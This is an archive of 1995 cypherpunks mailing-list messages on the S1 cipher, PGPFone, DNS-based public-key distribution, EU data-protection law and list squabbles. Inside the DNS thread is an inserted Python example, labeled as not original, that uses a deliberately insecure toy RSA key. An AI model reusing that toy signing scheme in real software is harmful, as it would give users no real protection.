To: cypherpunks@toad.com
Subject: Re: "S1" encryption system
Message-ID: <199508111401.KAA07834@pipe5.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   Is it possible that there are multiple levels of encryption
   included in the "S1" algorithm?

   This question is prompted by reviewing the DoD's Multilevel
   Security (MLS) Program at:

      http://www.disa.mil/MLS/mls_home.html

   One of the features of this program is to design means to
   simultaneously transmit data with different levels of
   security, so that communicants send and/or read the data
   according to their levels of security clearance. This is
   amplified in Section 3 of the program description at:

      http://www.disa.mil/MLS/info/basics/sec3.html#2

   Excerpts:

      Multilevel security allows information systems to
      provide capabilities that augment its existing
      single-level data processing and data communications
      services. Data of multiple security levels are  
      processed and transferred by the system, which also
      separates the different security levels and controls
      access to the data. ...

      When a system operates in the multilevel mode, it allows
      data of two or more security levels to be processed
      simultaneously when not all users have the clearance,
      formal authorization, or need to know for all data
      handled by the system. The system is able to separate
      and protect the data according to these restrictions.
   
      To amplify the definition, an MLS system might process
      both Secret and Top Secret collateral data and have some
      users whose maximum clearance is Secret and others whose
      maximum clearance is Top Secret. Another MLS system
      might have all its users cleared at the Top Secret
      level, but have the ability to release information
      classified as Secret to a network consisting of only
      Secret users and systems. Still another system might
      process both Secret and Unclassified information and
      have some users with no clearance. In each of these
      instances, the system must implement mechanisms to
      provide assurance that the system's security policy is
      strictly enforced. In these examples, the policy  
      allows access to the data by only those users who are
      appropriately cleared and authorized (e.g., having
      formal access approval) and who have an official need to
      know for the data.
   
      A related mode of operation is the partitioned mode,
      also known as compartmented mode. Although similar
      concepts and solutions are involved for compartmented
      mode operations as are for the multilevel mode, there is
      also a key difference. In the compartmented mode, all
      users have clearances for all the data processed but may
      not have authorizations for all the data; whereas for
      multilevel mode, some users may not even be cleared for
      the highest level. Because the compartmented mode is
      often envisioned for the intelligence community, all
      such users would have Top Secret security clearances and
      often authorizations for one or more, but possibly not
      all, compartments in the system.

   End excerpts.

   There are also descriptions of the soft and hardware
   implementations of MLS.

   Would anyone care to comment on how this differentiation of
   levels of security is done, by a single encryption program
   or multiples, and if multiples, their arrangement? Is
   this feature then embedded in the hardware, such as the Fortezza
   card system cited in the program?











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Aug 95 11:01:51 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508110645.CAA29891@bb.hks.net>
Message-ID: <199508111759.KAA05515@netcom8.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>I can't violate my NDA, but PGPFone will be a *major* revolution for
>communication security. I would not be surprised to see several hundred
>thousands of users. PGP will pale in comparison.

I sincerely doubt this. if someone could find a way of doing 
voice encryption through simple idiotproof hardware adapters
(I am thinking of cups that you could attach to any standard phone)
the voice encryption will not be widely used, I think.
there are very many PGP users right now, say at least in the
tens of thousands if not hundreds of thousands. the 
requirements for live voice encryption are pretty significant:
a fast computer and fast modem. this alone is only a subset
of those people using PGP right now. also, I doubt there are
going to be few people who use PGP phone but not PGP software.

the real holy grail for voice communication encryption is
when this stuff starts to get integrated into the real 
phone system, or people start making hardware that is
cheap and self contained and idiot proof. "but it's difficult
to make anything foolproof, because fools are so ingenious" <g>

the actual phone networks, because of political pressure, 
certainly are probably going to be the last entities on 
earth to use hardware that makes encryption built in.
(well, assuming they don't get all that cash from the 
government to build in key escrow).

what I think would be cool, and I'm sure everyone here would
agree, is a "back door" way to encryption. one example:
it used to be that slip providers were charging a lot of
money. then the authors of TIA (Internet Adaptor) discovered
they could simulate SLIP over a unix shell account without
a significant performance penalty (i.e. it was possible).
voila!! slip for everyone, *regardless* of what the provider
wants or tries to manage. then, someone did this for
*free* in public domain SLiRP software.

this is an extremely useful model: "big fish provider" gives
a capability that people want, namely processing time and
disk space. they think they can regulate the uses of their
system, but if there is enough degrees of freedom, they 
cannot, and people can actually simulate the services they
want on the system regardless of what the system operators
wish to control or not control.

with the phone system, the analogy is that the communication
networks are providing bandwidth, and while they would like
to control things like voice vs. data vs. encryption, they
*cannot* if their capabilities are suitably diverse (and
it is virtually impossible for them *not* to be).

when someone invents cheap hardware that you can just plug
on top of any existing phone, i.e. "the phone adaptor", TPA?,
*that's* when the world is going to go crazy with crypto.
all this stuff that requires lots of hardware can be used,
but the thing that will cause *everyone* to use it is when
someone invents a TPA. I'm very, very surprised that no 
one has tried to do this yet.


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Fri, 11 Aug 95 11:25:39 PDT
To: "Vladimir Z. Nuri" <vznuri@netcom.com>
Subject: Re: PRZ encrypted voice software release imminent
Message-ID: <v02120d06ac515d75289e@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain



Of course, if it was a substantial improvement over the
other "Internet Phone" stuff that's out there, and had
a good way of dealing with switching, etc., then people
would use it to make "free" l.d. phone calls on the net,
and the cryptography would get a free ride.

Generally, you are right in suggesting that anything that
requires people to crawl behind their computers, attach
new cables, purchase and debug a sound card under Windows,
and generally engage in techno-weenie hardware manipulations
will have less appeal than something plug and play. Even
given the extremely user-hostile elements of PGP the software,
I would be surprised if PGPFone became as popular.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jason Burrell" <jburrell@crl.com>
Date: Fri, 11 Aug 95 10:00:16 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508110645.CAA29891@bb.hks.net>
Message-ID: <199508111655.LAA03909@crl.com>
MIME-Version: 1.0
Content-Type: text/plain


> In article <199508110254.TAA02204@netcom14.netcom.com>, vznuri@netcom.com
> ("Vladimir Z. Nuri") wrote:
> 
> >as if PRZ is not already enough of a folk hero....
> >BTW, he has been beat by Nautilus, right? Nautilus
> >is public domain, right? (I'm thinking of that public
> >domain voice encryption released a few mos ago).
> >I wonder if he is going to try to put a "spin" on this
> >one to differentiate it from the other one. on the
> >other hand, just having his name on it is plenty of
> >"spin"...
> 
> I can't violate my NDA, but PGPFone will be a *major* revolution for
> communication security. I would not be surprised to see several hundred
> thousands of users. PGP will pale in comparison.
> 
> --
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> ---
> [This message has been signed by an auto-signing service.  A valid signature
> means only that it has been received at the address corresponding to the
> signature and forwarded.]

This doesn't fall into line with the "mainstream" of personal computing, of
course, but does anyone know if there is a planned release for a Linux
version, preferably with SoundBlaster support? I mention Soundblaster
support because, even though it's old, it seems to be the standard, at least
indirectly. The GUS has a Soundblaster emulation mode, for instance, if I'm
not mistaken.

Of course I suppose the real reason I'm asking is because I run Linux and
have a Soundblaster. :)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David L. Garrard" <dgarrard@sola.com.au>
Date: Thu, 10 Aug 95 20:16:33 PDT
To: "remailer@bi-node.zerberus.de>
Subject: No Subject
Message-ID: <01BA67E7.5D664640@herbiehacker>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	Ford Prefect[SMTP:remailer@bi-node.zerberus.de]
Sent: 	Friday, 11 August 1995 2:31
To: 	cypherpunks@toad.com

I think we ought to just throw TIM MAY out of the list. 
let's EXCOMMUNICATE HIM. it's becoming increasingly clear
that he is the source of all our problems. I mean, isn't
it obvious that our progress has stalled? who has written
any code within the last 3 days? if we got rid of him,
it would be EVOLUTION IN ACTION. 

More drivel deleted.

     Personal attacks in this mailing list are highly inappropriate, but doing it through a Remailer is downright pathetic.

Dr David L. Garrard










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 11 Aug 95 03:56:17 PDT
To: cypherpunks@toad.com
Subject: Re: Australia, EU crypto ill news, crypto wars
In-Reply-To: <8500.9508110844@exe.dcs.exeter.ac.uk>
Message-ID: <Pine.HPP.3.91.950811113017.27133A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



Adam wrote:

> Ross Anderson <rja14@cl.cam.ac.uk> writes:
> > ... While at the conference, I found out that a classified meeting
> > took place this March in Germany between the signals intelligence
> > agencies of the developed countries, plus Australia and South Africa,
> > at which the assembled spooks agreed to press their governments to
> > bring in escrow and/or weak crypto.
............
> a) Lobbying - hopeless IMO, they aren't interested in listening, the
>    politicos are just too easy to manipulate and the "masses" aren't
>    clueful enough of what crypto means to understand the implications,
>    or even notice.

The "masses" are not that clueless (remember the 80% against Clipper
in a US poll a year ago). The problem 'here' in the EU is the smartly
construed distance between commons and rulers. We vote for members
of a debate club (who are very generously paid out of tax money)
lacking any power whatsoever. The EU decision on crypto-policy will
emerge from closed chambers of the Commission, and in every member
country the local politicians will announce that 'it has been decided
by EU and there is nothing we can do about it, even if we would like
to'. But this doesn't mean that national freedom-of-(crypto)speech
campaigns will be useless. Civil disobedience, still very common
amongst European citizens faced with ridiculous EU regulations, will
be more likely to thrive if the legitimacy of crypto regulations is
publicly questioned in a continuous mode.

A significant difference between (for example) Sweden and USA
is the punishment scales. Suppose Sweden had an ITAR (which
it hasn't). Almost everyone would laughingly export PGP and Wei's
library anyway, because the remote possibility of prosecution (assuming
similarities with the current situation in the US) would hardly
feel like a threat. A conviction would result in a few 100$ fine,
maximum. In the US, where the even so remote possibility of conviction
just possibly might bring about 5 years as Buba's girlfriend, well,
that's a very different story.

An *enforced* ban on crypto in Scandinavia is remote enough that
I'm confident 'SuperStego for Windows' will be out in ver 7.3b by then.

Mats
Gynecologist & Crypto-Groupie 







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: danisch@ira.uka.de (Hadmut Danisch)
Date: Fri, 11 Aug 95 03:57:29 PDT
To: cypherpunks@toad.com
Subject: Re: IPSEC goes to RFC
Message-ID: <9508111056.AA09426@elysion.iaks.ira.uka.de>
MIME-Version: 1.0
Content-Type: text/plain



> sdw@lig.net (Stephen D. Williams) wrote:
> 
> > I really like the idea of using DNS for (public I assume) keys...



ghio@cmu.edu (Matthew Ghio) wrote:
 
> I don't.
> 
> Public keys in the DNS is a bad idea because it makes it difficult to
> update the database, especially in large organizations.  When a host's
> key is issued or changed then they would have to get the nameserver
> admin to change it for them.  This could become a major problem/
> inconvenience for many, many people.  The host should be able to give
> its own key in response to a query.  That key could, of course, be
> signed by any number of trusted signators to guarantee authenticity.


I also like the idea of DNS-based public key distribution, but
what Matthew said is true. 

What about this:

Let the DNS-Server export the address of a machine which runs the
public-key-database for this domain, similar to the MX record for
the mailserver.

If you need the public key for a person identified by the email
address or for a host identified by hostname or IP address, you
could ask the DNS server where to get the public key.

The database host could run any program suitable to local requirements
and export public keys with a certain protocol...

Hadmut
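
[Added example, not part of the original post or of any draft cited in this thread. It sketches the lookup proposed above: DNS hands back the address of a per-domain key server, MX-style, and the client accepts the returned key only if a trusted signer has certified it. The "KEYSRV" record, the zone and server data, the walk up the domain name and the toy RSA signer are all assumptions made for illustration.]

```python
"""DNS as a pointer to a per-domain key server (constructed illustration).

The "KEYSRV" record, zone data, key-server contents and toy RSA signer
below are all assumptions for this example, not a real record type or
protocol.
"""
import hashlib

# Toy RSA key pair for the trusted signer. Both factors are Mersenne
# primes; this is for illustration only and offers no real security.
P, Q, E = 2**61 - 1, 2**89 - 1, 65537
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (Python 3.8+)


def digest(identity, key):
    """Hash the identity/key binding down to an integer below N."""
    data = identity.encode() + b"\0" + key
    return int.from_bytes(hashlib.sha256(data).digest(), "big") % N


def sign(identity, key):
    """Signer side: certify that `key` belongs to `identity`."""
    return pow(digest(identity, key), D, N)


def verify(identity, key, signature):
    """Client side: check the binding against the signer's public key."""
    return pow(signature, E, N) == digest(identity, key)


# Constructed zone: domain -> [(preference, key-server host)], like MX.
ZONE = {
    "example.org": [(20, "keys2.example.org"), (10, "keys1.example.org")],
}

# Constructed key servers: host -> {identity: (public key, signature)}.
# None models a server that does not answer.
KEY_SERVERS = {
    "keys1.example.org": None,
    "keys2.example.org": {
        "alice@example.org": (
            b"alice-public-key",
            sign("alice@example.org", b"alice-public-key"),
        ),
        "host.lab.example.org": (
            b"host-public-key",
            sign("host.lab.example.org", b"host-public-key"),
        ),
        # Key swapped on the server; signature covers the genuine key.
        "bob@example.org": (
            b"substituted-key",
            sign("bob@example.org", b"bob-public-key"),
        ),
    },
}


def find_key_servers(domain):
    """Return key-server hosts for `domain`, lowest preference first.

    Walks up the name (host.lab.example.org -> lab.example.org -> ...)
    and stops before the top-level label. The walk is an assumption.
    """
    labels = domain.lower().rstrip(".").split(".")
    for i in range(len(labels) - 1):
        records = ZONE.get(".".join(labels[i:]))
        if records:
            return [host for _, host in sorted(records)]
    return []


def lookup_key(identity):
    """Fetch and authenticate the key for an e-mail address or hostname.

    Returns (key, server). Raises ValueError if a server returns a key
    the trusted signer did not certify, LookupError if none is found.
    """
    domain = identity.rsplit("@", 1)[-1]
    for server in find_key_servers(domain):
        database = KEY_SERVERS.get(server)
        if database is None:  # server down: fall through to the next one
            continue
        entry = database.get(identity)
        if entry is None:
            continue
        key, signature = entry
        if not verify(identity, key, signature):
            raise ValueError(f"uncertified key for {identity} from {server}")
        return key, server
    raise LookupError(f"no key server has a key for {identity}")


if __name__ == "__main__":
    print(lookup_key("alice@example.org"))
    print(lookup_key("host.lab.example.org"))
```

[The DNS answer here is only a pointer, so the nameserver admin never has to touch individual keys, and a key substituted on the key server is rejected because the signer's certification no longer matches.]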




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 11 Aug 95 12:56:49 PDT
To: Derek Bell <cypherpunks@toad.com>
Subject: Re: EU Data Protection
Message-ID: <ac51018d04021004d19c@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:13 PM 8/11/95, Derek Bell wrote:

>        I think you miss an important point; your opinion is subjective, but
>data can relate to objective facts (e.g. credit records). Would you take the
>same stance if a credit bureau claimed that you couldn't pay back half the
>loans you took out?

Any entity which purports to hold or provide "true" information but which
holds flaky or incorrect information will suffer.

This is true of credit agencies, advice columns, restaurant reviews, movie
ratings, book reviewers, doctor rating agencies, and so on.

I won't get into all of the aspects of reputations, but this is what we're
talking about. And I'll concede that not all of these examples are equally
important, or use the same objective quality of data. A credit rating
agency is no doubt more important than a movie review agency--though
arguably the damaging effects of Siskel and Ebert trashing "Waterworld" can
be many orders of magnitude more than TRW Credit having an incorrect bad
debt recorded.

The point is that we do not have government to maintain the accuracy of
movie reviews, of lawyer ratings, and so forth.

Even if one accepts the "Fair Credit Reporting Act" (a U.S. law which I
think is unconstitutional, as it tells me I cannot report certain kinds of
facts), the European-style data privacy laws are a further step in a wrong
direction.

Think about it: the name "data privacy" sounds good, at first blush, but
what it really means is that my records are not private, that my records
are inspectable by government agents to see if I have stored any illegal
facts or correlations.

>        What worries me about the *lack* of some form of data protection
>legislation is that it allows someone to build up a database of information
>which is a mishmash of truth, misunderstandings and lies. How would you feel if
>"Concerned Citizens against Cryptography" compiled a list of all members
>of this list, branding them as `dangerous, possibly criminal subversives'?

Things like this happen all the time. This is just an opinion they happen
to have. Would you make it a crime for "Concerned Citizens against
Cryptography" to do a "who cypherpunks" of this list and to think we are
"dangerous, possibly criminal subversives"?

In the U.S. such judgements are made all the time. Doesn't make the
judgements right, but rightness is not the basis of the freedom to hold and
express these beliefs.

>What if that opinion was spread to other databases? How about the police
>investigating you because of this kind of database?

"Spreading" the opinion to other databases is no big deal.

The police investigating is a separate issue. Many of us think the police
should be very careful about investigating for beliefs and opinions, but,
in fact, it happens all the time. (It's happened to me, for example.)

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May            | Crypto Anarchy: encryption, digital money,
tcmay@got.net (Got net?)  | anonymous networks, digital pseudonyms, zero
408-728-0152              | knowledge, reputations, information markets,
Corralitos, CA            | black markets, collapse of governments.
Higher Power: 2^756839    | Public Key: PGP and MailSafe available.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Syed Yusuf <yusuf921@uidaho.edu>
Date: Fri, 11 Aug 95 13:30:04 PDT
To: "K. M. Ellis" <kelli@zeus.towson.edu>
Subject: Re: your mail
In-Reply-To: <Pine.ULT.3.91.950811142840.22062B-100000@zeus.towson.edu>
Message-ID: <Pine.HPP.3.91.950811133325.27559A-100000@goshawk.csrv.uidaho.edu>
MIME-Version: 1.0
Content-Type: text/plain



On Fri, 11 Aug 1995, K. M. Ellis wrote:

> SHUT UP.
> 

KEEP THIS CRAP IN *PRIVATE* MAIL




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 11 Aug 95 13:47:31 PDT
To: cman@communities.com (Douglas Barnes)
Subject: Purple Boxes
In-Reply-To: <v02120d06ac515d75289e@[199.2.22.120]>
Message-ID: <199508112044.NAA12959@netcom19.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



D.B.:
>Generally, you are right in suggesting that anything that
>requires people to crawl behind their computers, attach
>new cables, purchase and debug a sound card under Windows,
>and generally engage in techno-weenie hardware manipulations
>will have less appeal than something plug and play.

hey, how about this: remember all the plans for "blue boxes"
etc. that got circulated all over the place during the 70's?
I propose creating the schematics for a "Purple box". the
box would have, dangling, those little rubber cups that can fit over
phone receivers, like on the modems.

it would be called the "purple box" because I have not heard
of any other devices called "purple boxes" (i.e. this string
in the "colorful" hacker namespace does not seem to be used up yet)
and also the famous WWII compromised japanese diplomatic codes 
were called Purple.

the way it would work is that both the caller and callee would
have to agree to use the purple box. they would say "purple"
over the phone after they called up and then both hook up their
little gizmos.

the neat thing about this is that if it catches on, people
would end up buying and selling them and improving them.

actually, as I recall a long time ago someone proposed on this
list doing something very similar except using the devices
as a kind of "kids toy" that would introduce children to
encryption. it would allow them to talk through the device
like a bullhorn, and the receiver would hear gobbledygook
unless they had a decoder next to their ear. now I am
serious, this could be a *really* fun toy for kids. you know
how they love to keep secrets and play around with the idea
of communicating among their friends amidst their enemies.
someone who has an entrepreneurial nose, I bet you could
create a *hot*fad* out of this, and sell perhaps a fraction
as fast as Pogs!!! (you'd be a zillionaire at even 1% the
penetration!!!)

one of the problems is that serious crypto chips are pretty
expensive. but an analog scrambler would actually be a decent
start on all this, and I bet it could be built pretty cheaply.

I volunteer to find a place to *archive* (webify) any of the plans that
people write up and successfully test, including GIFs or whatever.



~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 10:50:51 PDT
To: shamrock@netcom.com (Lucky Green)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <v02120d00ac513fd2f9bc@[192.0.2.1]>
Message-ID: <199508111750.NAA25622@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 9:36 8/11/95, Ray Cromwell wrote:
> 
> >  My question is, how portable is it, and does it work over TCP/IP rather
> >than just modem connections (I suggested this about a year ago)? My ideal
> >implementation would function on the following architectures:
> 
> I can't comment on the features of PGPFone. However, know that Internet
> telephony (as all "real time" services) works over UDP only, not TCP.

  If you reread my message, you'll see I mentioned UDP. I just refer
to IP protocols in general as "TCP/IP", implicit is that UDP and ICMP
are at least included. The mention of "Winsock" should give you the context.

-Ray




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: paul@poboy.b17c.ingr.com (Paul Robichaux)
Date: Fri, 11 Aug 95 12:10:57 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <ac50c91b000210048e9d@[205.199.118.202]>
Message-ID: <199508111857.AA02958@poboy.b17c.ingr.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> But why the developers actually picked the Mac to do first is something
> they can talk about.

I worked on the Mac version of Nautilus for a very short while.
Nautilus was to provide a core of interoperable code for doing
voice-as-modem-stream on SunOS, DOS/Win, and Mac platforms. The
developer agreement that all developers had to execute specifically
said "I promise not to add any crypto."

That might sound odd-- but the crypto was to be added later, under the
direct or indirect supervision of PRZ. I ran out of time before the
code reached that point.

I don't know what percentage, if any, of the Nautilus code is
incorporated in PGPfone. Based on Will Price's CryptDisk work, I look
forward to learning from the PGPfone source code.

- -Paul

- -- 
Paul Robichaux, KD4JZG       | Do you support free speech? Even when
perobich@ingr.com            | you don't like what's being said?
		 Be a cryptography user. Ask me how.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMCuUFafb4pLe9tolAQF/vAQArDUGcD7SDpV1Zo6+neIl21SYQE34cqIx
Kpqs0NV67NUTg/U/EXxalFUs1lioCvGyEbwPRxTaEi3Idfbm5A8BOVDyFJIThtLx
3Nzf7OBpYqbztzht0+E8PGOZnx0dcN2+O1jeqm86GuNp5mJ6JmQZY2ey7aqTIDfr
gAZgUcIFM4k=
=JPdu
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 11:17:28 PDT
To: tcmay@got.net (Timothy C. May)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <ac50c91b000210048e9d@[205.199.118.202]>
Message-ID: <199508111816.OAA05222@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> At 1:36 PM 8/11/95, Ray Cromwell wrote:
> 
> >  My question is, how portable is it, and does it work over TCP/IP rather
> >than just modem connections (I suggested this about a year ago)? My ideal
> >implementation would function on the following architectures:
> >
> >Unix: can be used through either /dev/tty?? or Socket (probably want
> >to use UDP). Works on Solaris, IRIX, AIX, NetBSD/FreeBSD/BSDI and Linux.
> >(audio devices are all proprietary)
> >
> >
> >Windows: uses Windows' sound card device drivers, works via either
> >comport or WinSock
> >
> >Mac: uses Mac sound drivers, uses Mac modem port or MacTCP
> 
> From the "MacWeek" article, it initially runs on the Macintosh, using the
> sound capabilities built into (nearly) all Macs. Direct modem connections,
> with Internet versions to follow. (Windows to follow, too.)

  I just hope they isolated the operating system dependent code into
separate modules so that "PlaySoundChunk(Chunk)" is used rather than
"MacDeviceDriverCall(MacSpecificDeviceStruct, MacSpecificFormat)"
The application layer should be abstracted above the transmission
layer above the link-layer. At the application layer, communications
should be sent through the transmission layer, e.g.
"GetNextPGPFonePacket(Protocol, Packet)". The Protocol here would 
be TCPIPDriver or ModemDriver.  

  Therefore, all one would need to do to port it to different platforms
is code up a TCPIPDriver (for Unix == Berkeley Sockets, for 
Windows = Winsock, for Mac = MacTCP), code up a modem driver
(Unix = tty's + ioctl, Mac = Communications Manager, Windows = TAPI),
and finally port the SoundPlay and SoundRecord functions to the platform
dependent way of playing sounds and recording them.

  If you are forced to abstract above "modems", your algorithms will
be designed to work over more general transmission schemes. I fear
that coding for modems first will lead to an overall application tuned for
modems, but poorly designed for asynchronous networks. The tuning should
be done in the driver, not the application/algorithm level. 
(for example, modems don't experience much "packet churn and loss",
and they usually have a dependable bandwidth. Even if they retrain
randomly from 28.8 to 14.4, they can still be counted on to at least have
9600 bps throughput more consistently deliverable than say a slip/ppp line 
would)


  Far too often on Macs and PC's I see code "welded" to specific hardware
dependencies. I only hope that PGPFone is more like PGP2.0 and less like
PGP1.0 (and less like HotJava, which is also a bitch to port), because
for general acceptance, I don't think it will succeed until it
at least runs and interoperates on Mac, Windows, and Linux.


> The Mac may be a strange platform to develop on, to many of you, but it has
> some advantages. The sound tools are relatively standardized and are even
> built into the OS. Developers can thus count on what users will have.

   I don't think there is a problem with developing on the Mac. At least
the Mac has a real O/S. If it had been done for DOS first, it might have
been poking SoundBlaster registers with arcade magic constants in the
program. However, the application should be isolated away from its
I/O mechanisms so that all I/O is done through a module which
"maps" I/O requests to the local operating system mechanism, rather
than depending on them directly.

Sorry about the rant. (I haven't seen PGP phone's code, but I am
just remembering RealAudio/InternetPhone/VidPhone and a whole host
of other internet utilities that are either available only for windows,
only for Mac, or only for unix. Netscape seems to have done things
right.)

-Ray
 



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Hal <hfinney@shell.portal.com>
Date: Sat, 12 Aug 95 02:35:47 PDT
To: cypherpunks@toad.com
Subject: Re:  "S1" encryption system
Message-ID: <199508112127.OAA06516@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


From: Carl Ellison <cme@TIS.COM>
> Has it already been observed that the key scheduling repeats keys every
> 5 rounds?

There have been a couple of good messages on sci.crypt, one by Colin
Plumb and one by Thomas Jakobsen.  The latter mentioned something similar
re key scheduling.  I hadn't noticed it.  Chalk up another apparent
weakness.

Hal




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Fri, 11 Aug 95 11:29:30 PDT
To: Ford Prefect <remailer@bi-node.zerberus.de>
Subject: Re: your mail
In-Reply-To: <m0sgkM8-0002AfC@bi-node.zerberus.de>
Message-ID: <Pine.ULT.3.91.950811142840.22062B-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


SHUT UP.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 11 Aug 95 10:55:30 PDT
To: perry@piermont.com
Subject: Re: IPSEC goes to RFC
In-Reply-To: <199508111327.JAA01106@panix4.panix.com>
Message-ID: <m0sgyqo-0009ywC@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> Nesta Stubbs writes:
> > There are some other problems too I believe.  I have worked for a decent 
> > sized network who did all user authentication at the terminal servers for 
> > dial-in accounts thru DNS.  This wasn't too bad for just passws and 
> > stuff, but wouldn't this cause some bloat in the nameservers database?  
> 
> HESIOD is an excellent demonstration that it works just fine.
> 
> > As well as cause problems security wise when it comes to updates.  Would 
> > these automatically not be cached in any form by the site making the 
> > request?  This also causes a problem for smaller time people who perhaps 
> > have a PPP/SLIP connection 24/7 but have nameserve done by their prvider, 
> > and I for sure don't want my provider to be in control of those keys. 
> 
> Why not? After all, they are signed. You can have them held by your
> worst enemy and it should be just fine. Thats the idea of public key
> signatures.

Not only that but it's common now for DNS servers to give short TTL
for the answers (multiple A recs for load balancing), no big deal
to have pseudo-subdomains that are pointed at a different server
(Even over slip/ppp) than normal name service.

I believe the root servers' answers for intermediate nodes are cached
normally, so key.george.bub.com doesn't cause a root hit after
bub.com has been resolved.

Quite a few domains do run their own name servers, and it's not too tough
to create auto-update scripts, etc.

There's no reason that DNS has to be the only mechanism.  Default
to one method then fall back to others, like direct IP port connection
for query.

> .pm
> 

sdw
-- 
Stephen D. Williams 25Feb1965 VW,OH (FBI ID) sdw@lig.net http://www.lig.net/sdw
Consultant, Vienna,VA Mar95- 703-918-1491W 43392 Wayside Cir.,Ashburn, VA 22011
OO/Unix/Comm/NN       ICBM/GPS: 39 02 37N, 77 29 16W home, 38 54 04N, 77 15 56W
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.;28May95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Rich Helton" <rich_helton@msmgate.mrg.uswest.com>
Date: Fri, 11 Aug 95 13:38:56 PDT
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <n1403970617.32050@msmgate>
MIME-Version: 1.0
Content-Type: text/plain


help <rich_helton@msmgate.mrg.uswest.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Fri, 11 Aug 95 11:42:41 PDT
To: vznuri@netcom.com (Vladimir Z. Nuri)
Subject: Re: PRZ encrypted voice software release imminent
In-Reply-To: <199508111759.KAA05515@netcom8.netcom.com>
Message-ID: <199508111842.OAA12222@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> 
> >I can't violate my NDA, but PGPFone will be a *major* revolution for
> >communication security. I would not be surprised to see several hundred
> >thousands of users. PGP will pale in comparison.
> 
> I sincerely doubt this. if someone could find a way of doing 
> voice encryption through simple idiotproof hardware adapters
> (I am thinking of cups that you could attach to any standard phone)
> the voice encryption will not be widely used, I think.
> there are very many PGP users right now, say at least in the
> tens of thousands if not hundreds of thousands. the 
> requirements for live voice encryption are pretty significant:
> a fast computer and fast modem. this alone is only a subset
> of those people using PGP right now. also, I doubt there are
> going to be few people who use PGP phone but not PGP software.

  I don't think CPUs and modems are an issue. When I bought my 486/DX2
more than a year ago, it was a near top of the line machine (a P66 was the 
only thing better and it was a lot more expensive). Now, I can look
in computer shopper and see that not only is my machine not near the
top of the line, it's not even "Entry Level". Pentium 75/90 systems are
going for 1/3 the price I bought my computer for, and those systems have
PCI buses (vs my VESA local bus), larger HDs, EDO RAM, faster video
cards, etc. Assuming a baseline of a 486DX/33 or faster (like a DX4)
is not unreasonable. Secondly, 14.4K modems are a dime a dozen. You
